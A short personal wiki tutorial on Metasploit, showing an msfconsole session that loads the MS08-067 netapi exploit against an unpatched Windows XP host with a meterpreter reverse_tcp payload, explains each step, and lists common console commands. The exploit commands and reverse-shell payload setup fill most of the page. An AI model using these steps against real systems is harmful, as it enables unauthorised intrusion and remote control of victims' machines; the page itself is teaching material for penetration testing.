Metasploit

Aus SchnallIchNet
Wechseln zu: Navigation, Suche

general example

running an exploit against netapi on a windows xp host
working for UNPATCHED WinXP-SP3 hosts... 

# msfconsole

[snipped some info output]

msf > search ms08_067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption


msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 10.0.my.host
LHOST => 10.0.my.host
msf  exploit(ms08_067_netapi) > set RHOST 10.0.victim.host
RHOST => 10.0.victim.host

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.0.my.host:4444
[-] Exploit exception: The connection timed out (10.0.victim.host:445).
[*] Exploit completed, but no session was created.
msf  exploit(ms08_067_netapi) >

and as you can see: the host is patched ;-)

explaining the output:

  1. 1st starting msfconsole
  2. search for vulnerability-exploit ms08_067 and get the full path to the exploit
  3. say use the exploit
  4. set the local IP address (attacking host-ip) LHOST
  5. set the remote IP address (victim host) RHOST
  6. set the payload to send to victim host windows/meterpreter/reverse_tcp
    which opens a revers tcp-connection
  7. start exploiting: exploit

if the exploit was successful, you will get a prompt like this: 

meterpreter> 
meterpreter> shell
[snipped output of starting windows cmd]


useful commands

some useful commands...


search for an explizit exploit

search ms08_067


show available exploits

show exploits


show all payloads

show payloads


show infos yout an exploit

info exploit exploit/windows/smb/ms08_067_netapi


show infos about a payload

info payload windows/meterpreter/reverse_tcp


show options

if exploit and/or payload is already set, it will display informations about: 

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) >
Von „https://schnallich.net/index.php?title=Metasploit&oldid=1128